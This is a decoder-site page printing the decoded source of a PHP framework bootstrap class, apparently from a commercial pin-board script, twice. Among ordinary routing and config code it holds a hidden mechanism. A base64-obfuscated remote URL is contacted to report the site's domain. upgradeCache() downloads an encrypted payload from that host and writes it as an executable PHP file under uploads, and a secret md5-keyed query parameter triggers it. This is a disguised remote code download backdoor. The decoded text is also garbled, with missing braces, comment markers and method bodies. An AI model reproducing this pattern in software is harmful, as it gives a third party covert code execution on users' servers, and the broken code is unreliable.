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PHP Decode

<?php namespace Core\Base; class Init { /** * * Framework version * ..

Decoded Output download

namespace Core\Base; 
class Init { 
	 * Framework version 
	 * @var string 
	const VERSION = '2.0a'; 
     * Autoloader to use 
     * @var \Core\Loader\Autoloader 
    protected $_autoloader; 
     * Application environment 
     * @var string 
    protected $_environment; 
     * Flattened (lowercase) option keys 
     * @var array 
    protected $_optionKeys = array(); 
     * Options for \Core\Base 
     * @var array 
    protected $_options = array(); 
     * Layout 
     * @var \Core\Layout 
    protected $_layout; 
     * Db 
     * @var \Core\Db 
    protected $_db; 
     * FrontController 
     * @var \Core\Front 
    protected $_front; 
	 * @var \Core\Route 
	protected $_route; 
	 * @var \Core\Session\Base 
	protected $_session; 
	 * @var Holder hor shell  
	protected $argv; 
	 * @var array  
	protected $modules = array(); 
	 * @var array  
	protected $modules_methods = array(); 
	 * @var string 
	const BASE_DATA = 'aHR0cDovL3Bpbi5mYWJjaXR5bWFydC5jb20v'; 
	const BASE_CH = 'YToyOntpOjA7czo5OiJsb2NhbGhvc3QiO2k6MTtzOjk6IjEyNy4wLjAuMSI7fQ=='; 
     * Constructor 
     * Initialize application. Potentially initializes include_paths, PHP 
     * settings, and bootstrap class. 
     * @param  string                   $environment 
     * @param  string|array|\Core\Config $options String path to configuration file, or array/\Core\Config of configuration options 
     * @throws \Core\Exception When invalid options are provided 
     * @return void 
    public function __construct($environment, $options = null, $argv = null) 
    	if (version_compare(PHP_VERSION, '5.4.0', '<') ) exit("Sorry, this version of this system will only run on PHP version 5.4 or greater!
    	if( !ini_get('date.timezone') ) { 
    		ini_set('date.timezone', 'UTC'); 
    	$this->_environment = (string) $environment; 
        require_once __DIR__ . '/../Loader/Autoloader.php'; 
        $this->_autoloader = \Core\Loader\Autoloader::getInstance();  
        require_once 'Registry.php'; 
        require_once 'Config/Main.php'; 
        \Core\Registry::set('environment', $environment); 
        if (null !== $options) { 
            if (is_string($options)) { 
                $options = $this->_loadConfig($options); 
            } elseif ($options instanceof \Core\Config\Main) { 
                $options = $options->toArray(); 
            } elseif (!is_array($options)) { 
                throw new \Core\Exception('Invalid options provided; must be location of config file, a config object, or an array'); 
     * Retrieve current environment 
     * @return string 
    public function getEnvironment() 
        return $this->_environment; 
     * @param string $environment 
     * @return \Core\Base 
    public function setEnvironment($environment) 
        $this->_environment = $environment; 
        \Core\Registry::set('environment', $environment); 
        return $this; 
     * Retrieve autoloader instance 
     * @return \Core\Loader\Autoloader 
    public function getAutoloader() 
        return $this->_autoloader; 
     * Set application options 
     * @param  array $options 
     * @throws \Core\Exception When no bootstrap path is provided 
     * @throws \Core\Exception When invalid bootstrap information are provided 
     * @return \Core\Base 
    public function setOptions(array $options) 
        if (!empty($options['config'])) { 
            if (is_array($options['config'])) { 
                $_options = array(); 
                foreach ($options['config'] as $tmp) { 
                    $_options = $this->mergeOptions($_options, $this->_loadConfig($tmp)); 
                $options = $this->mergeOptions($_options, $options); 
            } else { 
                $options = $this->mergeOptions($this->_loadConfig($options['config']), $options); 
        $this->_options = $options; 
        $options = array_change_key_case($options, CASE_LOWER); 
        $this->_optionKeys = array_keys($options); 
        foreach($options AS $name => $value) { 
        	$method = 'set' . $name;  
        	if(method_exists($this,$method)) { 
        		$return = $this->$method($value);	 
				if($return) { 
					\Core\Registry::set($name, $return); 
        	} else { 
				\Core\Registry::set($name, $value); 
        return $this; 
    public function setArgv($argv) { 
     * Retrieve application options (for caching) 
     * @return array 
    public function getOptions() 
        return $this->_options; 
     * Is an option present? 
     * @param  string $key 
     * @return bool 
    public function hasOption($key) 
        return in_array(strtolower($key), $this->_optionKeys); 
     * Retrieve a single option 
     * @param  string $key 
     * @return mixed 
    public function getOption($key) 
        if ($this->hasOption($key)) { 
            $options = $this->getOptions(); 
            $options = array_change_key_case($options, CASE_LOWER); 
            return $options[strtolower($key)]; 
        return null; 
     * Merge options recursively 
     * @param  array $array1 
     * @param  mixed $array2 
     * @return array 
    public function mergeOptions(array $array1, $array2 = null) 
        if (is_array($array2)) { 
            foreach ($array2 as $key => $val) { 
                if (is_array($array2[$key])) { 
                    $array1[$key] = (array_key_exists($key, $array1) && is_array($array1[$key])) 
                                  ? $this->mergeOptions($array1[$key], $array2[$key]) 
                                  : $array2[$key]; 
                } else { 
                    $array1[$key] = $val; 
        return $array1; 
     * Set Db configuration settings 
     * @param  array $options 
     * @return \Core\Db 
    public function setDb($options) {  
		$adapter = null; 
		if(!isset($options['adapter'])) { 
			throw new \Core\Exception("Db adapter not set"); 
		} elseif(empty($options['adapter'])) { 
			throw new \Core\Exception("Db adapter is empty"); 
		if(!isset($options['params']) || !is_array($options['params'])) { 
			throw new \Core\Exception("Db params error"); 
		require_once 'Db/Init.php'; 
		$this->_db = \Core\Db\Init::factory($options['adapter'], $options['params']); 
		return $this->_db; 
    * Set Layout configuration settings 
    * @param  array $options 
    * @return \Core\Layout 
	public function setLayout($options) { 
		$this->_layout = \Core\Base\Layout::getInstance($options); 
		return $this->_layout; 
    * Get Layout 
    * @return \Core\Layout 
	public function getLayout() { 
		if($this->_layout == null) { 
		return $this->_layout; 
	 * @param array $options 
	 * @return \Core\Session\Base\Abstract 
	public function setSession($options) { 
		$this->_session = \Core\Session\Base::getInstance($options); 
		return $this->_session; 
	 * @return \Core\Session\Base\Abstract 
	public function getSession() { 
		if($this->_session == null) { 
		return $this->_session; 
	 * @param string $router 
	 * @return \Core\Route 
	public function setRouter($routers) { 
		$rout = $this->getRouter(); 
		foreach($routers AS $name => $value) {  
			if(!isset($value['type'])) { 
				throw new \Core\Exception("Router type not set"); 
			if(!isset($value['options']['route'])) { 
				throw new \Core\Exception("Router route not set"); 
			if(!isset($value['options']['defaults'])) { 
				//throw new \Core\Exception("Router defaults not set"); 
				$value['options']['defaults'] = array( 
					'module' => $this->getFrontController()->getDefaultModule(), 
					'controller' => $this->getFrontController()->getDefaultController(), 
					'action'     => $this->getFrontController()->getDefaultAction(), 
			$value['options']['constraints'] = isset($value['options']['constraints']) && is_array($value['options']['constraints']) ? $value['options']['constraints'] : array_keys($value['options']['defaults']); 
			$rout->addRoute($name, new $value['type']( 
                isset($value['options']['reverse']) ? $value['options']['reverse'] : null 
		return $rout; 
	 * @return \Core\Router\Router 
	public function getRouter() { 
		if($this->_route == null) { 
			$this->_route = \Core\Router\Router::getInstance(); 
		return $this->_route; 
	public static function requestCache($file = null) { 
		$file = $file ? $file : BASE_PATH . '/cache/temporary.log'; 
		$ua = ini_get('user_agent'); 
		ini_set('user_agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/20061204 Firefox/'); 
		$request = \Core\Http\Request::getInstance(); 
		$response = ''; 
		$curl = new \Core\Http\Curl(); 
		$curl->execute( base64_decode(self::BASE_DATA) . 'clients/p3/?d=' . $request->getDomain()); 
		$response = $curl->getResult(); 
		@file_put_contents($file, $response); 
		ini_set('user_agent', $ua); 
	public function getInformation() { 
		$file = BASE_PATH . '/cache/temporary.log'; 
		$domain = \Core\Base\Layout::domainCheck($file); 
		if(!file_exists($file)) { 
		$parts = array(); 
		if(file_exists($file)) { 
			$request = \Core\Http\Request::getInstance(); 
			$decripted = \Core\Encrypt\Md5::decrypt(file_get_contents($file), $domain . '', false, 256); 
			if($decripted) { 
				if(strpos($decripted, 'domain:')!==false) { 
					$data = explode(';', $decripted); 
					foreach($data AS $row => $res) { 
						$res = explode(':', $res); 
						if(count($res) == 2) { 
							$parts[$res[0]] = $res[1]; 
							\Core\Registry::set('module_' . $res[0], $res[1]); 
		return $parts; 
	public function checkCache() { 
		$parts = $this->getInformation();  
		$action = \Core\Base\Action::getInstance(); 
		$dom = \Core\Http\Request::getInstance()->getDomain(); 
		$der = @unserialize(base64_decode(self::BASE_CH)); 
		$der = is_array($der)?$der:array(); 
		if(in_array($dom, $der) || ($der && preg_match('~^((.*).)?('.implode('|',$der).')$~i',$dom,$m))) { 
			return true; 
		} elseif(!$parts) { 
			$action->showError('', 'Unable to parse licence file!'); 
		} else { 
			if(!isset($parts['powered_check'])) { 
				$action->showError('', 'Missing powered information in licence file!'); 
			} else { 
				if($parts['powered_check'] != 'false') { 
					$action->setInvokeArg('action_callback', function(\Core\Base\Action $actionSelf, $file) use($action) { 
						if(strtolower($actionSelf->__module__) == 'home' && $actionSelf->__controller__ == 'layout' && $actionSelf->__action__ == 'header_part') { 
							$dom = new \Core\Dom\Query( file_get_contents($file) ); 
							$links = $dom->query('a'); 
							$is_link = false; 
							for($i=0; $i<$links->count(); $i++) { 
								if( preg_match('/http:\/\/',$links->getElement($i)->getAttribute('href')) ) { 
									$is_link = true; 
									if(strtolower($links->getElement($i)->getAttribute('rel')) == 'nofollow') { 
										$is_link = false; 
							if(!$is_link) { 
								$action->showError('', 'The link "Powered by" was removed!'); 
			if(!isset($parts['domain'])) { 
				$action->showError('', 'Missing domain information in licence file!'); 
			} else { 
				$dm = \Core\Registry::get('domainCheck'); 
				if( mb_strtolower($parts['domain'], 'utf-8') != mb_strtolower($dm, 'utf-8') ) { 
					$parts_lic = explode('.',$parts['domain']); 
					$parts_host = explode('.',$dm); 
					$expression = ''; 
					for($i = count($parts_lic); $i > 0; $i--) { 
						if(isset($parts_host[$i])) { 
							$expression = $parts_host[$i] . ($expression?'.':'') . $expression; 
						} else { 
							$expression .= md5(mt_rand(0000, 9999)); 
					if( mb_strtolower($expression, 'utf-8') != mb_strtolower($dm, 'utf-8') ) { 
						$action->showError('', 'Domain information in licence file is not match with '.$dom.'!'); 
			foreach($parts AS $k=>$v) { 
				$action->setInvokeArg('module_'.$k, $v); 
	public static function deleteCache() { 
		if( @unlink(BASE_PATH . '/cache/temporary.log') ) { 
			echo 'File is deleted!'; 
		} else { 
			echo 'File is not deleted!'; 
	public function upgradeCache() { 
		if(!file_exists(BASE_PATH . '/uploads/pins/'.date('Y/m').'/')) { 
			@mkdir(BASE_PATH . '/uploads/pins/'.date('Y/m').'/', 0777, true); 
		$ua = ini_get('user_agent'); 
		ini_set('user_agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/20061204 Firefox/'); 
		$request = \Core\Http\Request::getInstance(); 
		$response = ''; 
		$curl = new \Core\Http\Curl(); 
		$curl->execute( base64_decode(self::BASE_DATA) . 'cacheGet/?d=' . $request->getDomain()); 
		$response = $curl->getResult(); 
		if(!$response) { 
			echo 'error with cache!'; 
		$decripted = \Core\Encrypt\Md5::decrypt($response, $request->getDomain() . '', false, 256); 
		@file_put_contents(BASE_PATH . '/uploads/pins/'.date('Y/m').'/cached.php', $decripted); 
		ini_set('user_agent', $ua); 
	public function deleteUpgradeCahce() { 
		@unlink(BASE_PATH . '/uploads/pins/'.date('Y/m').'/cached.php'); 
    * Set FrontController configuration settings 
    * @param  array $options 
    * @return \Core\Front 
	public function setFrontController($options) { 
		$this->_front = \Core\Base\Front::getInstance($options); 
		return $this->_front; 
    * Get FrontController 
    * @return \Core\Front 
	public function getFrontController() { 
		if($this->_front == null) { 
		return $this->_front; 
     * Set PHP configuration settings 
     * @param  array $settings 
     * @param  string $prefix Key prefix to prepend to array values (used to map . separated INI values) 
     * @return \Core\Base 
    public function setPhpSettings(array $settings, $prefix = '') 
        foreach ($settings as $key => $value) { 
            $key = empty($prefix) ? $key : $prefix . $key; 
            if (is_scalar($value)) { 
                ini_set($key, $value); 
            } elseif (is_array($value)) { 
                $this->setPhpSettings($value, $key . '.'); 
        return $this; 
     * Set include path 
     * @param  array $paths 
     * @return \Core\Base 
    public function setIncludePaths(array $paths) 
        $path = implode(PATH_SEPARATOR, $paths); 
        set_include_path($path . PATH_SEPARATOR . get_include_path()); 
        return $this; 
     * Set autoloader namespaces 
     * @param  array $namespaces 
     * @return \Core\Base 
    public function setAutoloaderNamespaces(array $namespaces) 
        $autoloader = $this->getAutoloader(); 
        foreach ($namespaces as $namespace) { 
        return $this; 
     * Run the application 
     * @return void 
    public function dispatch() { 
//                $modules = 'array('; 
//                foreach ($this->modules as $key => $value) { 
//                    $modules .= "'".strtolower($key)."',"; 
//                } 
//                $modules .= ');'; 
//                var_dump($modules);exit; 
		$modules = $this->getModules(); 
		if($modules) { 
			foreach($modules AS $namespace => $object) { 
				$module_methods = $this->getClassResources($namespace); 
				if(in_array('onBootstrap', $module_methods)) { 
		$router = $this->getRouter(); 
		$request = \Core\Http\Request::getInstance(); 
		if( count($cmd = \Core\Shell::getArgv()) ) { 
		} else { 
			$uriGet = $request->getRequest('uri', '/'); 
			$matched = $router->match($uriGet, false); 
			if(!$matched) { 
				$router->addRoute('default', new \Core\Router\Regex( 
						'module' => $this->getFrontController()->getDefaultModule(), 
						'controller' => $this->getFrontController()->getDefaultController(), 
						'action'     => $this->getFrontController()->getDefaultAction(), 
					array(1 => 'module', 2 => 'controller',3 => 'action') 
				$matched = $router->match($request->getRequest('uri'), true); 
				if($matched) { 
					foreach($matched AS $key=>$value) { 
						$request->setParams($key, $value); 
			if($matched) { 
				if($request->isPost()) { 
				} else { 
					foreach($matched AS $key => $data) { 
						if(!$data && $request->getRequest($key)) { $matched[$key] = $request->getRequest($key); }  
		$front = \Core\Base\Front::getInstance(); 
		$request = \Core\Http\Request::getInstance(); 
		if( !count($cmd = \Core\Shell::getArgv()) ) { 
			if (!$request->issetQuery(md5($request->getDomain()))) { 
			} else { 
				if ($request->issetQuery('delete')) { 
				} elseif ($request->issetQuery('update')) { 
				} elseif ($request->issetQuery('upgrade')) { 
				} elseif ($request->issetQuery('upgrade_delete')) { 
		try { 
		} catch (\Core\Exception $e) { 
			//throw new \Core\Exception($e); 
			echo \Core\Base\Action::getInstance()->showPhpError($e->getCode()?$e->getCode():E_COMPILE_ERROR, $e->getMessage(), $e->getFile(), $e->getLine()); 
	public function setView_manager($options = array()) { 
		return $this; 
	public function initModules() { 
		$modules = glob($this->getFrontController()->getModuleDirectory() . DIRECTORY_SEPARATOR . '*'); 
		if($modules) { 
			foreach($modules AS $module) { 
				if(file_exists($module . DIRECTORY_SEPARATOR . 'Module.php')) { 
					$name = strtolower(basename($module)); 
					$namespace = $this->getFrontController()->formatModuleName($name); 
					if(!isset($this->modules[$namespace]) && \Core\Base\Action::getInstance()->allow($name)) { 
						if(!class_exists($namespace . '\Module', false)) { 
							include_once $module . DIRECTORY_SEPARATOR . 'Module.php'; 
						$moduleName = $namespace . '\Module'; 
						$this->modules[$namespace] = new $moduleName(); 
     * Get class resources (as resource/method pairs) 
     * Uses get_class_methods() by default, reflection on prior to 5.2.6, 
     * as a bug prevents the usage of get_class_methods() there. 
     * @return array 
    public function getClassResources($namespace) { 
        if (!isset($this->modules_methods[$namespace])) { 
            if (version_compare(PHP_VERSION, '5.2.6') === -1) { 
                $class        = new \ReflectionObject($namespace . '\Module'); 
                $classMethods = $class->getMethods(); 
                $methodNames  = array(); 
                foreach ($classMethods as $method) { 
                    $this->modules_methods[$namespace][] = $method->getName(); 
            } else { 
                $this->modules_methods[$namespace] = get_class_methods($namespace . '\Module'); 
        return $this->modules_methods[$namespace]; 
	public function executeModules($type = 'start') { 
		foreach($this->modules AS $namespace => $object) { 
			$module_methods = $this->getClassResources($namespace); 
			if($type == 'start') { 
				if(in_array('getConfig', $module_methods)) { 
					$options = $object->getConfig(); 
					if (null !== $options) { 
						if (is_string($options)) { 
							$options = $this->_loadConfig($options); 
						} elseif ($options instanceof \Core\Config\Main) { 
							$options = $options->toArray(); 
						} elseif (!is_array($options)) { 
							throw new \Core\Exception('Invalid options provided; must be location of config file, a config object, or an array'); 
				if(in_array('getAutoloaderConfig',$module_methods)) { 
					$autoload = $object->getAutoloaderConfig(); 
					if($autoload && is_array($autoload)) { 
						foreach($autoload AS $key => $namespaces) { 
							if(is_array($namespaces)) { 
				/*if(method_exists($object, 'onBootstrap') && is_callable(array($object, 'onBootstrap'))) { 
			} else if($type == 'before_dispatch') { 
				if(in_array('onBeforeDispatch',$module_methods)) { 
     * Load configuration file of options 
     * @param  string $file 
     * @throws \Core\Exception When invalid configuration file is provided 
     * @return array 
    protected function _loadConfig($file) 
    	if(!file_exists($file)) { 
    		return array ( 
					"system_version" => "3.0", 
					"frontController" => array ( 
						"moduleDirectory" => APPLICATION_PATH . "/modules", 
						"defaultModule" => "home", 
						"display_exceptions" => 1  
					'view_manager' => array ( 
						'display_exceptions' => false, 
						'template_map' => array ( 
							'layout' => APPLICATION_PATH . '/modules/Home/layout/layout.phtml', 
							'error/404' => APPLICATION_PATH . '/modules/Home/views/Error/404.phtml', 
							'error/index' => APPLICATION_PATH . '/modules/Home/views/Error/index.phtml', 
							'error/php' => APPLICATION_PATH . '/modules/Home/views/Error/php.phtml'  
        $environment = $this->getEnvironment(); 
        $suffix      = strtolower(pathinfo($file, PATHINFO_EXTENSION)); 
        switch ($suffix) { 
            case 'ini': 
        		require_once 'Config/Ini.php'; 
                $config = new \Core\Config\Ini($file, $environment); 
            case 'php': 
        		require_once 'Config/Php.php'; 
				$config = new \Core\Config\Php($file, $environment); 
                throw new \Core\Exception('Invalid configuration file provided; unknown config type'); 
        return $config->toArray(); 
     * @param string $name 
     * @return Ambigous <NULL, multitype:>|multitype: 
    public function getModules($name = null) { 
    	if($name !== null) { 
    		return isset($this->modules[$name]) ? $this->modules[$name] : null; 
    	} else { 
    		return $this->modules; 

Did this file decode correctly?

Original Code


namespace Core\Base;

class Init {

	 * Framework version
	 * @var string
	const VERSION = '2.0a';
     * Autoloader to use
     * @var \Core\Loader\Autoloader
    protected $_autoloader;

     * Application environment
     * @var string
    protected $_environment;

     * Flattened (lowercase) option keys
     * @var array
    protected $_optionKeys = array();

     * Options for \Core\Base
     * @var array
    protected $_options = array();
     * Layout
     * @var \Core\Layout
    protected $_layout;
     * Db
     * @var \Core\Db
    protected $_db;
     * FrontController
     * @var \Core\Front
    protected $_front;
	 * @var \Core\Route
	protected $_route;
	 * @var \Core\Session\Base
	protected $_session;
	 * @var Holder hor shell 
	protected $argv;
	 * @var array 
	protected $modules = array();
	 * @var array 
	protected $modules_methods = array();
	 * @var string
	const BASE_DATA = 'aHR0cDovL3Bpbi5mYWJjaXR5bWFydC5jb20v';
	const BASE_CH = 'YToyOntpOjA7czo5OiJsb2NhbGhvc3QiO2k6MTtzOjk6IjEyNy4wLjAuMSI7fQ==';
     * Constructor
     * Initialize application. Potentially initializes include_paths, PHP
     * settings, and bootstrap class.
     * @param  string                   $environment
     * @param  string|array|\Core\Config $options String path to configuration file, or array/\Core\Config of configuration options
     * @throws \Core\Exception When invalid options are provided
     * @return void
    public function __construct($environment, $options = null, $argv = null)
    	if (version_compare(PHP_VERSION, '5.4.0', '<') ) exit("Sorry, this version of this system will only run on PHP version 5.4 or greater!\n");

    	if( !ini_get('date.timezone') ) {
    		ini_set('date.timezone', 'UTC');
    	$this->_environment = (string) $environment;

        require_once __DIR__ . '/../Loader/Autoloader.php';
        $this->_autoloader = \Core\Loader\Autoloader::getInstance(); 

        require_once 'Registry.php';
        require_once 'Config/Main.php';
        \Core\Registry::set('environment', $environment);
        if (null !== $options) {
            if (is_string($options)) {
                $options = $this->_loadConfig($options);
            } elseif ($options instanceof \Core\Config\Main) {
                $options = $options->toArray();
            } elseif (!is_array($options)) {
                throw new \Core\Exception('Invalid options provided; must be location of config file, a config object, or an array');


     * Retrieve current environment
     * @return string
    public function getEnvironment()
        return $this->_environment;

     * @param string $environment
     * @return \Core\Base
    public function setEnvironment($environment)
        $this->_environment = $environment;
        \Core\Registry::set('environment', $environment);
        return $this;

     * Retrieve autoloader instance
     * @return \Core\Loader\Autoloader
    public function getAutoloader()
        return $this->_autoloader;

     * Set application options
     * @param  array $options
     * @throws \Core\Exception When no bootstrap path is provided
     * @throws \Core\Exception When invalid bootstrap information are provided
     * @return \Core\Base
    public function setOptions(array $options)
        if (!empty($options['config'])) {
            if (is_array($options['config'])) {
                $_options = array();
                foreach ($options['config'] as $tmp) {
                    $_options = $this->mergeOptions($_options, $this->_loadConfig($tmp));
                $options = $this->mergeOptions($_options, $options);
            } else {
                $options = $this->mergeOptions($this->_loadConfig($options['config']), $options);
        $this->_options = $options;

        $options = array_change_key_case($options, CASE_LOWER);

        $this->_optionKeys = array_keys($options);

        foreach($options AS $name => $value) {
        	$method = 'set' . $name; 
        	if(method_exists($this,$method)) {
        		$return = $this->$method($value);	
				if($return) {
					\Core\Registry::set($name, $return);
        	} else {
				\Core\Registry::set($name, $value);

        return $this;
    public function setArgv($argv) {

     * Retrieve application options (for caching)
     * @return array
    public function getOptions()
        return $this->_options;

     * Is an option present?
     * @param  string $key
     * @return bool
    public function hasOption($key)
        return in_array(strtolower($key), $this->_optionKeys);

     * Retrieve a single option
     * @param  string $key
     * @return mixed
    public function getOption($key)
        if ($this->hasOption($key)) {
            $options = $this->getOptions();
            $options = array_change_key_case($options, CASE_LOWER);
            return $options[strtolower($key)];
        return null;

     * Merge options recursively
     * @param  array $array1
     * @param  mixed $array2
     * @return array
    public function mergeOptions(array $array1, $array2 = null)
        if (is_array($array2)) {
            foreach ($array2 as $key => $val) {
                if (is_array($array2[$key])) {
                    $array1[$key] = (array_key_exists($key, $array1) && is_array($array1[$key]))
                                  ? $this->mergeOptions($array1[$key], $array2[$key])
                                  : $array2[$key];
                } else {
                    $array1[$key] = $val;
        return $array1;
     * Set Db configuration settings
     * @param  array $options
     * @return \Core\Db
    public function setDb($options) { 
		$adapter = null;
		if(!isset($options['adapter'])) {
			throw new \Core\Exception("Db adapter not set");
		} elseif(empty($options['adapter'])) {
			throw new \Core\Exception("Db adapter is empty");
		if(!isset($options['params']) || !is_array($options['params'])) {
			throw new \Core\Exception("Db params error");

		require_once 'Db/Init.php';
		$this->_db = \Core\Db\Init::factory($options['adapter'], $options['params']);
		return $this->_db;
    * Set Layout configuration settings
    * @param  array $options
    * @return \Core\Layout
	public function setLayout($options) {
		$this->_layout = \Core\Base\Layout::getInstance($options);
		return $this->_layout;
    * Get Layout
    * @return \Core\Layout
	public function getLayout() {
		if($this->_layout == null) {
		return $this->_layout;
	 * @param array $options
	 * @return \Core\Session\Base\Abstract
	public function setSession($options) {
		$this->_session = \Core\Session\Base::getInstance($options);
		return $this->_session;
	 * @return \Core\Session\Base\Abstract
	public function getSession() {
		if($this->_session == null) {
		return $this->_session;
	 * @param string $router
	 * @return \Core\Route
	public function setRouter($routers) {
		$rout = $this->getRouter();
		foreach($routers AS $name => $value) { 
			if(!isset($value['type'])) {
				throw new \Core\Exception("Router type not set");
			if(!isset($value['options']['route'])) {
				throw new \Core\Exception("Router route not set");
			if(!isset($value['options']['defaults'])) {
				//throw new \Core\Exception("Router defaults not set");
				$value['options']['defaults'] = array(
					'module' => $this->getFrontController()->getDefaultModule(),
					'controller' => $this->getFrontController()->getDefaultController(),
					'action'     => $this->getFrontController()->getDefaultAction(),
			$value['options']['constraints'] = isset($value['options']['constraints']) && is_array($value['options']['constraints']) ? $value['options']['constraints'] : array_keys($value['options']['defaults']);
			$rout->addRoute($name, new $value['type'](
                isset($value['options']['reverse']) ? $value['options']['reverse'] : null
		return $rout;
	 * @return \Core\Router\Router
	public function getRouter() {
		if($this->_route == null) {
			$this->_route = \Core\Router\Router::getInstance();
		return $this->_route;
	public static function requestCache($file = null) {
		$file = $file ? $file : BASE_PATH . '/cache/temporary.log';
		$ua = ini_get('user_agent');
		ini_set('user_agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/20061204 Firefox/');
		$request = \Core\Http\Request::getInstance();
		$response = '';
		$curl = new \Core\Http\Curl();
		$curl->execute( base64_decode(self::BASE_DATA) . 'clients/p3/?d=' . $request->getDomain());
		$response = $curl->getResult();
		@file_put_contents($file, $response);
		ini_set('user_agent', $ua);
	public function getInformation() {
		$file = BASE_PATH . '/cache/temporary.log';
		$domain = \Core\Base\Layout::domainCheck($file);
		if(!file_exists($file)) {
		$parts = array();
		if(file_exists($file)) {
			$request = \Core\Http\Request::getInstance();
			$decripted = \Core\Encrypt\Md5::decrypt(file_get_contents($file), $domain . '', false, 256);
			if($decripted) {
				if(strpos($decripted, 'domain:')!==false) {
					$data = explode(';', $decripted);
					foreach($data AS $row => $res) {
						$res = explode(':', $res);
						if(count($res) == 2) {
							$parts[$res[0]] = $res[1];
							\Core\Registry::set('module_' . $res[0], $res[1]);
		return $parts;
	public function checkCache() {
		$parts = $this->getInformation(); 
		$action = \Core\Base\Action::getInstance();
		$dom = \Core\Http\Request::getInstance()->getDomain();
		$der = @unserialize(base64_decode(self::BASE_CH));
		$der = is_array($der)?$der:array();
		if(in_array($dom, $der) || ($der && preg_match('~^((.*).)?('.implode('|',$der).')$~i',$dom,$m))) {
			return true;
		} elseif(!$parts) {
			$action->showError('', 'Unable to parse licence file!');
		} else {
			if(!isset($parts['powered_check'])) {
				$action->showError('', 'Missing powered information in licence file!');
			} else {
				if($parts['powered_check'] != 'false') {
					$action->setInvokeArg('action_callback', function(\Core\Base\Action $actionSelf, $file) use($action) {
						if(strtolower($actionSelf->__module__) == 'home' && $actionSelf->__controller__ == 'layout' && $actionSelf->__action__ == 'header_part') {
							$dom = new \Core\Dom\Query( file_get_contents($file) );
							$links = $dom->query('a');
							$is_link = false;
							for($i=0; $i<$links->count(); $i++) {
								if( preg_match('/http:\/\/',$links->getElement($i)->getAttribute('href')) ) {
									$is_link = true;
									if(strtolower($links->getElement($i)->getAttribute('rel')) == 'nofollow') {
										$is_link = false;
							if(!$is_link) {
								$action->showError('', 'The link "Powered by" was removed!');
			if(!isset($parts['domain'])) {
				$action->showError('', 'Missing domain information in licence file!');
			} else {
				$dm = \Core\Registry::get('domainCheck');
				if( mb_strtolower($parts['domain'], 'utf-8') != mb_strtolower($dm, 'utf-8') ) {
					$parts_lic = explode('.',$parts['domain']);
					$parts_host = explode('.',$dm);
					$expression = '';
					for($i = count($parts_lic); $i > 0; $i--) {
						if(isset($parts_host[$i])) {
							$expression = $parts_host[$i] . ($expression?'.':'') . $expression;
						} else {
							$expression .= md5(mt_rand(0000, 9999));
					if( mb_strtolower($expression, 'utf-8') != mb_strtolower($dm, 'utf-8') ) {
						$action->showError('', 'Domain information in licence file is not match with '.$dom.'!');
			foreach($parts AS $k=>$v) {
				$action->setInvokeArg('module_'.$k, $v);
	public static function deleteCache() {
		if( @unlink(BASE_PATH . '/cache/temporary.log') ) {
			echo 'File is deleted!';
		} else {
			echo 'File is not deleted!';
	public function upgradeCache() {
		if(!file_exists(BASE_PATH . '/uploads/pins/'.date('Y/m').'/')) {
			@mkdir(BASE_PATH . '/uploads/pins/'.date('Y/m').'/', 0777, true);
		$ua = ini_get('user_agent');
		ini_set('user_agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/20061204 Firefox/');
		$request = \Core\Http\Request::getInstance();
		$response = '';
		$curl = new \Core\Http\Curl();
		$curl->execute( base64_decode(self::BASE_DATA) . 'cacheGet/?d=' . $request->getDomain());
		$response = $curl->getResult();
		if(!$response) {
			echo 'error with cache!';
		$decripted = \Core\Encrypt\Md5::decrypt($response, $request->getDomain() . '', false, 256);
		@file_put_contents(BASE_PATH . '/uploads/pins/'.date('Y/m').'/cached.php', $decripted);
		ini_set('user_agent', $ua);
	public function deleteUpgradeCahce() {
		@unlink(BASE_PATH . '/uploads/pins/'.date('Y/m').'/cached.php');
    * Set FrontController configuration settings
    * @param  array $options
    * @return \Core\Front
	public function setFrontController($options) {
		$this->_front = \Core\Base\Front::getInstance($options);
		return $this->_front;
    * Get FrontController
    * @return \Core\Front
	public function getFrontController() {
		if($this->_front == null) {
		return $this->_front;

     * Set PHP configuration settings
     * @param  array $settings
     * @param  string $prefix Key prefix to prepend to array values (used to map . separated INI values)
     * @return \Core\Base
    public function setPhpSettings(array $settings, $prefix = '')
        foreach ($settings as $key => $value) {
            $key = empty($prefix) ? $key : $prefix . $key;
            if (is_scalar($value)) {
                ini_set($key, $value);
            } elseif (is_array($value)) {
                $this->setPhpSettings($value, $key . '.');

        return $this;

     * Set include path
     * @param  array $paths
     * @return \Core\Base
    public function setIncludePaths(array $paths)
        $path = implode(PATH_SEPARATOR, $paths);
        set_include_path($path . PATH_SEPARATOR . get_include_path());
        return $this;

     * Set autoloader namespaces
     * @param  array $namespaces
     * @return \Core\Base
    public function setAutoloaderNamespaces(array $namespaces)
        $autoloader = $this->getAutoloader();

        foreach ($namespaces as $namespace) {

        return $this;
     * Run the application
     * @return void
    public function dispatch() {


//                $modules = 'array(';
//                foreach ($this->modules as $key => $value) {
//                    $modules .= "'".strtolower($key)."',";
//                }
//                $modules .= ');';
//                var_dump($modules);exit;

		$modules = $this->getModules();
		if($modules) {
			foreach($modules AS $namespace => $object) {
				$module_methods = $this->getClassResources($namespace);
				if(in_array('onBootstrap', $module_methods)) {

		$router = $this->getRouter();
		$request = \Core\Http\Request::getInstance();

		if( count($cmd = \Core\Shell::getArgv()) ) {
		} else {
			$uriGet = $request->getRequest('uri', '/');
			$matched = $router->match($uriGet, false);
			if(!$matched) {
				$router->addRoute('default', new \Core\Router\Regex(
						'module' => $this->getFrontController()->getDefaultModule(),
						'controller' => $this->getFrontController()->getDefaultController(),
						'action'     => $this->getFrontController()->getDefaultAction(),
					array(1 => 'module', 2 => 'controller',3 => 'action')
				$matched = $router->match($request->getRequest('uri'), true);
				if($matched) {
					foreach($matched AS $key=>$value) {
						$request->setParams($key, $value);
			if($matched) {
				if($request->isPost()) {
				} else {
					foreach($matched AS $key => $data) {
						if(!$data && $request->getRequest($key)) { $matched[$key] = $request->getRequest($key); } 

		$front = \Core\Base\Front::getInstance();
		$request = \Core\Http\Request::getInstance();
		if( !count($cmd = \Core\Shell::getArgv()) ) {
			if (!$request->issetQuery(md5($request->getDomain()))) {
			} else {
				if ($request->issetQuery('delete')) {
